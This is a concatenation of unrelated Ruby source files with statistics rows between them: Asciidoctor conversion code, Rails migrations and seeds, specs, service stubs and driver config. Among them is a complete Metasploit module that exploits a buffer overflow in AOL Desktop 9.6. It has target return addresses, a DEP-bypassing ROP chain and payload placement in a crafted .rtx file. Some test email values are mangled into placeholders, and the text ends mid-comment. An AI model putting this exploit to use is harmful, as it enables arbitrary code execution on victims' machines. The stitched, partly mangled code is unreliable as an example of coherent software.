to_dir = options.delete(:to_dir)
mkdirs = options.delete(:mkdirs) || false
timings = options[:timings]
case to_file
when true, nil
write_to_same_dir = !to_dir && ::File === input
stream_output = false
write_to_target = to_dir
to_file = nil
when false
write_to_same_dir = false
stream_output = false
write_to_target = false
to_file = nil
when '/dev/null'
return self.load input, options
else
write_to_same_dir = false
stream_output = to_file.respond_to? :write
write_to_target = stream_output ? false : to_file
end
unless options.key? :header_footer
options[:header_footer] = true if write_to_same_dir || write_to_target
end
# NOTE at least make intended target directory available, if there is one
if write_to_same_dir
input_path = ::File.expand_path input.path
options[:to_dir] = (outdir = ::File.dirname input_path)
elsif write_to_target
if to_dir
if to_file
options[:to_dir] = ::File.dirname ::File.expand_path(::File.join to_dir, to_file)
else
options[:to_dir] = ::File.expand_path to_dir
end
elsif to_file
options[:to_dir] = ::File.dirname ::File.expand_path to_file
end
else
options[:to_dir] = nil
end
doc = self.load input, options
if write_to_same_dir
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
if outfile == input_path
raise ::IOError, %(input file and output file cannot be the same: #{outfile})
end
elsif write_to_target
working_dir = options.has_key?(:base_dir) ? ::File.expand_path(options[:base_dir]) : ::File.expand_path(::Dir.pwd)
# QUESTION should the jail be the working_dir or doc.base_dir???
jail = doc.safe >= SafeMode::SAFE ? working_dir : nil
if to_dir
outdir = doc.normalize_system_path(to_dir, working_dir, jail, :target_name => 'to_dir', :recover => false)
if to_file
outfile = doc.normalize_system_path(to_file, outdir, nil, :target_name => 'to_dir', :recover => false)
# reestablish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
else
outfile = ::File.join outdir, %(#{doc.attributes['docname']}#{doc.outfilesuffix})
end
elsif to_file
outfile = doc.normalize_system_path(to_file, working_dir, jail, :target_name => 'to_dir', :recover => false)
# establish outdir as the final target directory (in the case to_file had directory segments)
outdir = ::File.dirname outfile
end
unless ::File.directory? outdir
if mkdirs
::FileUtils.mkdir_p outdir
else
# NOTE we intentionally refer to the directory as it was passed to the API
raise ::IOError, %(target directory does not exist: #{to_dir})
end
end
else
outfile = to_file
outdir = nil
end
timings.start :convert if timings
opts = outfile && !stream_output ? { 'outfile' => outfile, 'outdir' => outdir } : {}
output = doc.convert opts
timings.record :convert if timings
if outfile
timings.start :write if timings
doc.write output, outfile
timings.record :write if timings
# NOTE document cannot control this behavior if safe >= SafeMode::SERVER
# NOTE skip if stylesdir is a URI
if !stream_output && doc.safe < SafeMode::SECURE && (doc.attr? 'linkcss') &&
(doc.attr? 'copycss') && (doc.attr? 'basebackend-html') &&
!((stylesdir = (doc.attr 'stylesdir')) && (Helpers.uriish? stylesdir))
copy_asciidoctor_stylesheet = false
copy_user_stylesheet = false
if (stylesheet = (doc.attr 'stylesheet'))
if DEFAULT_STYLESHEET_KEYS.include? stylesheet
copy_asciidoctor_stylesheet = true
elsif !(Helpers.uriish? stylesheet)
copy_user_stylesheet = true
end
end
copy_coderay_stylesheet = (doc.attr? 'source-highlighter', 'coderay') && (doc.attr 'coderay-css', 'class') == 'class'
copy_pygments_stylesheet = (doc.attr? 'source-highlighter', 'pygments') && (doc.attr 'pygments-css', 'class') == 'class'
if copy_asciidoctor_stylesheet || copy_user_stylesheet || copy_coderay_stylesheet || copy_pygments_stylesheet
stylesoutdir = doc.normalize_system_path(stylesdir, outdir, doc.safe >= SafeMode::SAFE ? outdir : nil)
Helpers.mkdir_p stylesoutdir if mkdirs
if copy_asciidoctor_stylesheet
Stylesheets.instance.write_primary_stylesheet stylesoutdir
# FIXME should Stylesheets also handle the user stylesheet?
elsif copy_user_stylesheet
if (stylesheet_src = (doc.attr 'copycss')).empty?
stylesheet_src = doc.normalize_system_path stylesheet
else
# NOTE in this case, copycss is a source location (but cannot be a URI)
stylesheet_src = doc.normalize_system_path stylesheet_src
end
stylesheet_dst = doc.normalize_system_path stylesheet, stylesoutdir, (doc.safe >= SafeMode::SAFE ? outdir : nil)
unless stylesheet_src == stylesheet_dst || (stylesheet_content = doc.read_asset stylesheet_src).nil?
::File.open(stylesheet_dst, 'w') {|f|
f.write stylesheet_content
}
end
end
if copy_coderay_stylesheet
Stylesheets.instance.write_coderay_stylesheet stylesoutdir
elsif copy_pygments_stylesheet
Stylesheets.instance.write_pygments_stylesheet stylesoutdir, (doc.attr 'pygments-style')
end
end
end
doc
else
output
end
end
# Alias render to convert to maintain backwards compatibility
alias :render :convert
# Public: Parse the contents of the AsciiDoc source file into an
# Asciidoctor::Document and convert it to the specified backend format.
#
# input - the String AsciiDoc source filename
# options - a String, Array or Hash of options to control processing (default: {})
# String and Array values are converted into a Hash.
# See Asciidoctor::Document#initialize for details about options.
#
# Returns the Document object if the converted String is written to a
# file, otherwise the converted String
def convert_file filename, options = {}
self.convert ::File.new(filename || ''), options
end
# Alias render_file to convert_file to maintain backwards compatibility
alias :render_file :convert_file
end
if RUBY_ENGINE == 'opal'
require 'asciidoctor/version'
require 'asciidoctor/timings'
else
autoload :VERSION, 'asciidoctor/version'
autoload :Timings, 'asciidoctor/timings'
end
end
# core extensions
require 'asciidoctor/core_ext'
# modules
require 'asciidoctor/helpers'
require 'asciidoctor/substitutors'
# abstract classes
require 'asciidoctor/abstract_node'
require 'asciidoctor/abstract_block'
# concrete classes
require 'asciidoctor/attribute_list'
require 'asciidoctor/block'
require 'asciidoctor/callouts'
require 'asciidoctor/converter'
require 'asciidoctor/converter/html5' if RUBY_ENGINE_OPAL
require 'asciidoctor/document'
require 'asciidoctor/inline'
require 'asciidoctor/list'
require 'asciidoctor/parser'
require 'asciidoctor/path_resolver'
require 'asciidoctor/reader'
require 'asciidoctor/section'
require 'asciidoctor/stylesheets'
require 'asciidoctor/table'
| 33.056825 | 202 | 0.5871 |
b92f33022d807a0789381755d64ae81505089be3 | 336 | daniel = User.create! name: "daniel", password: "secret"
# Seed each user's task list; create! raises on validation failure so a bad
# seed aborts loudly.
["paint the fence", "wax the car", "sand the deck"].each do |chore|
  daniel.tasks.create! name: chore
end
ryanb = User.create! name: "ryanb", password: "secret"
["record some RailsCasts", "work on CanCan"].each do |chore|
  ryanb.tasks.create! name: chore
end
| 37.333333 | 56 | 0.732143 |
bf1f7f0b2a728170d1e49ad6cc0868598ba5c355 | 575 | require File.dirname(__FILE__) + '/../../spec_helper'
# mspec-style specs for Bignum#>= (mixed-type comparison and error behavior).
describe "Bignum#>=" do
  before(:each) do
    # bignum_value is an mspec helper: a value guaranteed to be a Bignum on
    # the host platform, offset by the given amount — TODO confirm base value
    @bignum = bignum_value(14)
  end
  it "returns true if self is greater than or equal to other" do
    (@bignum >= @bignum).should == true
    (@bignum >= (@bignum + 2)).should == false
    (@bignum >= 5664.2).should == true
    (@bignum >= 4).should == true
  end
  it "raises an ArgumentError when given a non-Integer" do
    # NOTE(review): this pins historical behavior; confirm the targeted Ruby
    # version still raises ArgumentError (not TypeError) for these operands
    lambda { @bignum >= "4" }.should raise_error(ArgumentError)
    lambda { @bignum >= mock('str') }.should raise_error(ArgumentError)
  end
end
| 28.75 | 71 | 0.636522 |
abdb8615b413f2af24a0a8be90417dfbf3b708eb | 195 | # frozen_string_literal: true
module RubyEventStore
  ::RSpec.describe Flipper do
    # Smoke test: the gem must define its VERSION constant.
    it "has a version number" do
      expect(described_class::VERSION).to_not be_nil
    end
  end
end
| 19.5 | 60 | 0.728205 |
012b32bffa2abc816622e19fdfd70b009e79e445 | 139 | class AddStatusToSolutions < ActiveRecord::Migration[5.0]
def change
add_column :solutions, :status, :integer, default: 0
end
end | 27.8 | 58 | 0.741007 |
79cfdca8fd462c85cafa3bf46dd73dd8b37f4b0a | 1,372 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 0.9.6 on 2014-08-12 14:22:33.
require 'ads_common/savon_service'
require 'dfp_api/v201405/content_bundle_service_registry'
module DfpApi; module V201405; module ContentBundleService
  class ContentBundleService < AdsCommon::SavonService
    # NOTE this class is generated upstream ("changes will be overwritten");
    # keep edits in the generator if possible.
    #
    # SOAP actions exposed by this service; each is a thin delegator to
    # execute_action on the underlying Savon service.
    SERVICE_ACTIONS = [
      :create_content_bundles,
      :get_content_bundles_by_statement,
      :perform_content_bundle_action,
      :update_content_bundles
    ]

    def initialize(config, endpoint)
      namespace = 'https://www.google.com/apis/ads/publisher/v201405'
      super(config, endpoint, namespace, :v201405)
    end

    # Define one public method per action with the same signature as the
    # hand-written defs they replace (*args plus an optional block).
    SERVICE_ACTIONS.each do |action|
      define_method(action) do |*args, &block|
        execute_action(action.to_s, args, &block)
      end
    end

    private

    def get_service_registry()
      ContentBundleServiceRegistry
    end

    def get_module()
      DfpApi::V201405::ContentBundleService
    end
  end
end; end; end
| 29.191489 | 77 | 0.739796 |
3392f55db09df7847e311a2b88094d62df07748a | 2,193 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
  # test "the truth" do
  #   assert true
  # end
  # NOTE(review): every email literal below reads "[email protected]" — the
  # fixtures look mangled by an address-obfuscation pass, so the format,
  # uniqueness and normalization tests no longer exercise distinct or
  # realistic addresses; restore the original literals.
  def setup
    @user = User.new(name: "Example User", email: '[email protected]', password: 'foovar', password_confirmation: 'foovar')
  end
  test "should be valid" do
    assert @user.valid?
  end
  test "name should be present" do
    @user.name = " "
    assert_not @user.valid?
  end
  test "name should not be too long" do
    @user.name = "a" * 51
    assert_not @user.valid?
  end
  test "email should not be too long" do
    # 244 + "@example.com" (12 chars) = 256, one past the 255 limit
    @user.email = "a" * 244 + "@example.com"
    assert_not @user.valid?
  end
  test "email validation should accept valid addresses" do
    valid_addresses = %w[[email protected] [email protected] [email protected]
                         [email protected] [email protected]]
    valid_addresses.each do |valid_address|
      @user.email = valid_address
      assert @user.valid?, "#{valid_address.inspect} should be valid"
    end
  end
  test "email validation should reject invalid addresses" do
    invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
                           foo@bar_baz.com foo@bar+baz.com [email protected]]
    invalid_addresses.each do |invalid_address|
      @user.email = invalid_address
      assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
    end
  end
  test "email addresses should be unique" do
    duplicate_user = @user.dup
    duplicate_user.email = @user.email.upcase
    # persist the original so the duplicate's validation hits the uniqueness
    # check (which must also be case-insensitive)
    @user.save
    assert_not duplicate_user.valid?
  end
  test "email addresses should be saved as lower-case" do
    mixed_case_email = "[email protected]"
    @user.email = mixed_case_email
    @user.save
    assert_equal mixed_case_email.downcase, @user.reload.email
  end
  test "password should be present (nonblank)" do
    @user.password = @user.password_confirmation = " " * 6
    assert_not @user.valid?
  end
  test "password should have a minimum length" do
    @user.password = @user.password_confirmation = "a" * 5
    assert_not @user.valid?
  end
  test "authenticated? should return false for a user with nil digest" do
    assert_not @user.authenticated?('')
  end
end
| 28.855263 | 122 | 0.677611 |
f726f0896dc3171bf70baa41e748d47f70c10f98 | 2,286 | # -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
# Bootstrap for the OpenNebula virtual-network manager drivers: extends the
# load path, pulls in the driver components, and loads the shared
# configuration (with built-in defaults as a fallback).
$: << File.dirname(__FILE__)
$: << File.join(File.dirname(__FILE__), '..')
# Standard library dependencies.
require 'rexml/document'
require 'base64'
require 'yaml'
# Driver components, resolved through the load-path entries added above.
require 'command'
require 'vm'
require 'nic'
require 'address'
require 'security_groups'
require 'security_groups_iptables'
require 'vnm_driver'
require 'sg_driver'
require 'vlan'
require 'no_vlan'
require 'scripts_common'
# Load every pluggable extension shipped in vnmmad-load.d next to this file.
Dir[File.expand_path('vnmmad-load.d', File.dirname(__FILE__)) + "/*.rb"].each{ |f| require f }
include OpenNebula
# Read the network driver configuration. NOTE(review): the bare rescue below
# swallows any StandardError (missing file, bad YAML, permission errors alike)
# and silently falls back to the defaults.
begin
    NAME = File.join(File.dirname(__FILE__), "../etc/vnm/OpenNebulaNetwork.conf")
    CONF = YAML.load_file(NAME)
rescue
    # Default configuration values
    CONF = {
        :arp_cache_poisoning => true,
        :vxlan_mc => "239.0.0.0",
        :vxlan_ttl => "16",
        :vxlan_mtu => "1500",
        :validate_vlan_id => false,
        :vlan_mtu => "1500",
        :ipset_maxelem => "65536",
        :keep_empty_bridge => false,
        :datastore_location => '/var/lib/one/datastores'
    }
end
# Set PATH
# Ensure common system binary directories are reachable for shelled-out tools.
ENV['PATH'] = "#{ENV['PATH']}:/bin:/sbin:/usr/bin"
| 38.1 | 94 | 0.500437 |
871ad1e80d78f5df85ef36cb2ca2a77b510caf3b | 75 | Rails.application.routes.draw do
  # Expose all of the CasPer engine's routes under the /cas_per mount point.
  mount CasPer::Engine => "/cas_per"
end
| 15 | 36 | 0.733333 |
6a7811e9e8858d1d4c118ad26bbbddbbbaa8e36c | 489 | class CreateSpreePartLots < ActiveRecord::Migration
  # Creates the spree_part_lots table: a tree of lots linking assembly lots
  # to their component part lots. The lft/rgt/depth/children_count columns
  # match a nested-set layout — NOTE(review): presumably maintained by a
  # nested-set gem (e.g. awesome_nested_set); confirm before altering.
  def change
    create_table :spree_part_lots do |t|
      t.integer :assembly_lot_id, null: false, index: true
      t.integer :part_lot_id, null: false, index: true
      t.integer :parent_id, null: true, index: true
      t.integer :lft, null: false, index: true
      t.integer :rgt, null: false, index: true
      t.integer :depth, null: false, default: 0
      t.integer :children_count, null: false, default: 0
    end
  end
end
| 34.928571 | 58 | 0.678937 |
4a537383be7866cdac33a33bf332d21f2ff8a323 | 1,995 | module Fastlane::Actions
  # Specs for the action that force-quits macOS's CoreSimulatorService by
  # polling `launchctl list` and issuing `launchctl remove` until it is gone.
  describe 'QuitCoreSimulatorServiceAction' do
    describe '#run' do
      # `launchctl list` reports nothing running, so no remove is issued.
      it 'does nothing if CoreSimulatorService is not running' do
        allow(Fastlane::Actions).to receive(:sh).and_return('')
        config = FastlaneCore::Configuration.create(
          QuitCoreSimulatorServiceAction.available_options,
          { }
        )
        result = QuitCoreSimulatorServiceAction.run(config)
        expect(result).to be_empty
      end
      # First poll sees the service running, second sees it gone; the action
      # should issue exactly one remove command.
      it 'quits within 10 attempts' do
        mocked_launchctl_list_results = [ 'running', '' ]
        allow(Fastlane::Actions).to receive(:sh)
          .with(/launchctl list/, anything) do
            # Each poll consumes the next canned `launchctl list` response.
            mocked_launchctl_list_results.shift
          end
        allow(Fastlane::Actions).to receive(:sh)
          .with(/launchctl remove/, anything)
          .and_return('launchctl remove')
        config = FastlaneCore::Configuration.create(
          QuitCoreSimulatorServiceAction.available_options,
          { }
        )
        # Stub sleep so the retry loop does not slow the suite down.
        allow(QuitCoreSimulatorServiceAction).to receive(:sleep)
        result = QuitCoreSimulatorServiceAction.run(config)
        expect(result).to eq(['launchctl remove'])
      end
      # The service never stops reporting as running, so after the retry
      # budget is exhausted the action must crash with a FastlaneCrash.
      it 'crashes after 11 attempts' do
        allow(Fastlane::Actions).to receive(:sh)
          .with(/launchctl list/, anything)
          .and_return('running')
        allow(Fastlane::Actions).to receive(:sh)
          .with(/launchctl remove/, anything)
          .and_return('launchctl remove')
        config = FastlaneCore::Configuration.create(
          QuitCoreSimulatorServiceAction.available_options,
          { }
        )
        allow(QuitCoreSimulatorServiceAction).to receive(:sleep)
        expect { QuitCoreSimulatorServiceAction.run(config) }.to(
          raise_error(FastlaneCore::Interface::FastlaneCrash) do |error|
            expect(error.message).to match(/Unable to quit com\.apple\.CoreSimulator\.CoreSimulatorService/)
          end
        )
      end
    end
  end
end
| 33.813559 | 108 | 0.639599 |
7abce1616f5c99c9c9529fb823518639074667fa | 867 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
# Project root used when resolving asset URLs.
http_path = "."
# css_dir = "stylesheets"
# sass_dir = "sass"
# images_dir = "images"
# javascripts_dir = "javascripts"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# Suppress the "/* line N, file */" debug comments in generated CSS.
line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.68 | 96 | 0.748558 |
4adf6f8c8b3da20a4227508783dc6f068f638f2d | 8,159 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# File-format exploit: builds a malicious .rtx file whose oversized HREF
# value overflows a strcpy'd buffer in AOL Desktop 9.6's rich.rct.
# WARNING: the offsets, return addresses and ROP gadget addresses below are
# byte-exact for the listed targets — do not reformat or "clean up" the
# padding arithmetic.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::FILEFORMAT
  def initialize(info={})
    super(update_info(info,
      'Name' => "AOL Desktop 9.6 RTX Buffer Overflow",
      'Description' => %q{
          This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
        component. By supplying a long string of data in the hyperlink tag, rich.rct copies
        this data into a buffer using a strcpy function, which causes an overflow, and
        results arbitrary code execution.
      },
      'License' => MSF_LICENSE,
      'Version' => "$Revision$",
      'Author' =>
        [
          'sup3r', #Initial disclosure, poc (9.5)
          'sickn3ss', #9.6 poc
          'sinn3r', #Metasploit
          'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
          'silent_dream', #Win 7 target
        ],
      'References' =>
        [
          [ 'OSVDB', '70741'],
          [ 'EDB', 16085 ],
        ],
      'Payload' =>
        {
          'Space' => 400,
          'BadChars' => "\x00\x0d\x0a\x3e\x7f",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'AOL Desktop 9.6 on Windows XP SP3',
            {
              'Ret' => 0x01DB4542, #0x01DB4542 JMP ESI
              'Offset'=> 5391, #Offset to EIP
              'Max' => 8000, #Buffer max. Can be more.
            },
          ],
          [
            'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
            {
              'Ret' => 0x6C02D216, # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
              'vp' => 0x7C801AD4, # (kernel32.dll) => VirtualProtect()
              'Offset' => 5368, # offset to rop
              'Max' => 8000, # Buffer max. Can be more.
            },
          ],
          [
            'AOL Desktop 9.6 on Windows 7',
            {
              'Ret' => 0x63227D6D, # JMP ESP in coolapi.dll
              'Offset' => 4327, # Offset to EIP
              'Max' => 8000, # Buffer max. Can be more
            }
          ],
        ],
      'Privileged' => false,
      'DisclosureDate' => "Jan 31 2011",
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
      ]
    )
  end
  # Builds the target-specific overflow string and writes it out as an RTX
  # (HTML-like) file with the payload embedded in an <A HREF> attribute.
  def exploit
    if target.name =~ /XP SP3$/
      # Compatible with what the poc has, and what I see on my debugger
      # Classic saved-return overwrite: payload placed before EIP, short
      # jumps hop back into the encoded payload.
      sploit = ''
      sploit << rand_text_alpha(4968+7)
      sploit << payload.encoded
      sploit << rand_text_alpha(5368-sploit.length)
      sploit << make_nops(11)
      sploit << "\xe9\x70\xfe\xff\xff" #JMP back 400 bytes
      sploit << [target.ret].pack('V')
      sploit << make_nops(target['Offset']-sploit.length-2)
      sploit << "\xeb\x04"
      sploit << [target.ret].pack('V')
      sploit << payload.encoded
      sploit << rand_text_alpha(target['Max']-sploit.length)
    elsif target.name =~ /SP3 - NX bypass$/
      #Thanks mr_me for the ROP chain
      # ROP chain marks the stack executable via VirtualProtect before
      # jumping into the payload (DEP/NX bypass).
      rop = ''
      # This is the start of ESI
      rop << rand_text_alpha(4) # junk - > POP ESI
      rop << rand_text_alpha(4) # junk - > POP EDI
      rop << rand_text_alpha(4) # junk - > POP EDI
      rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN
      # Take control of the stack pointer right here (EIP)
      rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
      rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer
      # Arg 4 of VirtualProtect() -> lpflOldProtect
      rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^
      # Arg 2 of VirtualProtect() -> dwsize (0x212C) & setup EAX
      rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
      rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
      rop << rand_text_alpha(4) # junk -------------------------------------------^^
      rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
      # Arg 3 of VirtualProtect() -> lpflOldProtectflNewProtect (PAGE_EXECUTE_READWRITE)
      rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
      rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
      rop << rand_text_alpha(4) # junk --------------------------------------^^
      rop << "\xbb\x07\x98\x64" # 0x649807BB (ebook.dll) => XCHG EAX,EDX; RETN
      rop << rand_text_alpha(4) # junk ----------------------------------------------^^
      # Arg 1 of VirtualProtect() -> return address & lpAddress
      # Also, setup call to VirtualProtect() ptr in ESI
      rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
      rop << "\x2c\x10\x49\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBP; RETN
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
      rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
      rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN
      # Continue safely, rop nop
      rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
      rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^
      # gently place our code on the stack
      rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN
      sploit = rand_text_alpha(target['Offset']-602) #688 was the original
      #mr_me's offset
      sploit << rop
      sploit << make_nops(74)
      sploit << payload.encoded
      #padding to the next offset
      sploit << rand_text_alpha(7)
      #the next offset
      sploit << rop
      sploit << make_nops(74)
      sploit << payload.encoded
      #Padding
      sploit << rand_text_alpha(target['Max']-sploit.length)
    elsif target.name =~ /Windows 7/
      #Thanks silent_dream
      # Short-jump trampoline over the return address into a NOP sled.
      sploit = ''
      sploit << rand_text_alpha(target['Offset']-2-14)
      sploit << "\xeb\x13"
      sploit << make_nops(14)
      sploit << [target.ret].pack('V')
      sploit << make_nops(15)
      sploit << payload.encoded
      sploit << rand_text_alpha(target['Max'] - sploit.length)
    end
    # Wrap the overflow string in the minimal HTML/RTX structure the
    # vulnerable parser expects: the HREF value is what gets strcpy'd.
    link_value = rand_text_alpha(6)
    rtx = "<HTML>"
    rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
    rtx << "</HTML>"
    print_status("Creating #{datastore['FILENAME']}...")
    file_create(rtx)
  end
end
=begin
0:000> g
Breakpoint 0 hit
eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30
eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
rich!ToolInit+0xed2c:
6909e187 e85cd50300 call rich!ToolInit+0x4c28d (690db6e8)
0:000> g
(8d8.924): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4
eip=43434343 esp=0022e760 ebp=0022e780 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
43434343 ?? ???
0:000> dd esi
02d53cb8 43434343 43434343 43434343 43434343
02d53cc8 43434343 43434343 43434343 43434343
02d53cd8 43434343 43434343 43434343 43434343
02d53ce8 43434343 43434343 43434343 43434343
02d53cf8 43434343 43434343 43434343 43434343
02d53d08 43434343 43434343 43434343 43434343
02d53d18 43434343 43434343 43434343 43434343
02d53d28 43434343 43434343 43434343 43434343
=end
| 34.572034 | 90 | 0.595416 |
ff137a46345c8484adc87516be44ecc00647212e | 389 | # Be sure to restart your server when you modify this file.
# Your secret key for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# NOTE(review): CONFIG is presumably loaded from an app-level settings file
# elsewhere in the boot process — confirm it is set before initializers run.
Lagotto::Application.config.secret_token = CONFIG[:secret_token]
| 48.625 | 69 | 0.784062 |
089cf397499ea661fb3dead0c864d023fdaf1654 | 2,785 | class CreateReports < ActiveRecord::Migration
  # Creates the core reporting schema: reports, their authors (reporters),
  # tag/filter join tables, and polling places.
  def self.up
    create_table "reports" do |t|
      t.string   "source", :limit => 3  # Short string to identify source; needed for uniqueid validation
      t.integer  "reporter_id"
      t.integer  "location_id"
      t.string   "uniqueid", :limit => 20   # Unique identifier string for Twitter, SMS, Asterisk
      t.string   "text"                     # Text of the report from Twitter, SMS or otherwise
      t.integer  "score"                    # Overall "score" of this report (0=no problems)
      t.string   "zip", :limit => 5         # Extracted zip associated with report
      t.integer  "wait_time"                # Extracted wait time associated with report
      t.integer  "polling_place_id"         # To attach to a polling place
      t.timestamps
    end
    add_index "reports", ["created_at"], :name => "index_reports_on_created_at"
    create_table "reporters" do |t|
      t.integer "location_id"
      t.string  "type", :limit => 30       # TwitterReporter, IPhoneReporter, SmsReporter, PhoneReporter
      t.string  "uniqueid", :limit => 80
      t.string  "name", :limit => 80
      t.string  "screen_name", :limit => 80
      t.string  "profile_location", :limit => 80
      t.string  "profile_image_url", :limit => 200
      t.integer "followers_count"
      t.timestamps
    end
    # A reporter is unique per (uniqueid, STI type) pair.
    add_index "reporters", ["uniqueid","type"], :name => "index_reports_on_uniqueid_and_type", :unique => true
    # Join table: reports <-> tags.
    create_table "report_tags" do |t|
      t.integer "report_id"
      t.integer "tag_id"
    end
    add_index "report_tags", ["report_id"], :name => "index_report_tags_on_report_id"
    add_index "report_tags", ["tag_id"], :name => "index_report_tags_on_tag_id"
    create_table "tags" do |t|
      t.string  "pattern", :limit => 30
      t.string  "description", :limit => 80
      t.integer "score"
    end
    # Join table: reports <-> filters. NOTE(review): forced to MyISAM,
    # presumably for legacy MySQL performance reasons — confirm still wanted.
    create_table "report_filters", :options => 'ENGINE=MyISAM' do |t|
      t.integer "report_id"
      t.integer "filter_id"
    end
    add_index "report_filters", ["report_id"], :name => "index_report_filters_on_report_id"
    add_index "report_filters", ["filter_id"], :name => "index_report_filters_on_filter_id"
    create_table "polling_places" do |t|
      t.integer "location_id"
      t.string  "name", :limit => 80
      t.string  "address", :limit => 80
      t.string  "city", :limit => 80
      t.string  "state", :limit => 2
      t.string  "zip", :limit => 10
      t.timestamps
    end
  end
  # Reverses the migration by dropping every table created above.
  def self.down
    drop_table :reports
    drop_table :reporters
    drop_table :report_tags
    drop_table :tags
    drop_table :report_filters
    drop_table :polling_places
  end
end
| 37.133333 | 118 | 0.609695 |
267788d2a4e6c286ea23e43d008cbcc66c8908b2 | 436 | class CreatePreneedSubmissions < ActiveRecord::Migration
  # Creates the preneed_submissions audit table: one row per submitted
  # application, keyed by its tracking number, with the upstream return
  # code/description recorded for troubleshooting.
  def change
    create_table :preneed_submissions do |t|
      t.string :tracking_number, null: false
      t.string :application_uuid, null: true
      t.string :return_description, null: false
      t.integer :return_code, null: true
      t.timestamps null: false
      # Both identifiers must be unique when present.
      t.index :tracking_number, unique: true
      t.index :application_uuid, unique: true
    end
  end
end
| 27.25 | 56 | 0.706422 |
0350e731c3a31f04d4683fec629e00ce943d1027 | 2,748 | # frozen_string_literal: true
module Neo4j::Driver
  module Internal
    module Retry
      # Re-runs a block of work (typically a transaction function) when it
      # fails with a retryable Neo4j error, sleeping between attempts with
      # exponentially growing, jittered delays until the total retry budget
      # (max_retry_time) is exhausted. All intermediate failures are attached
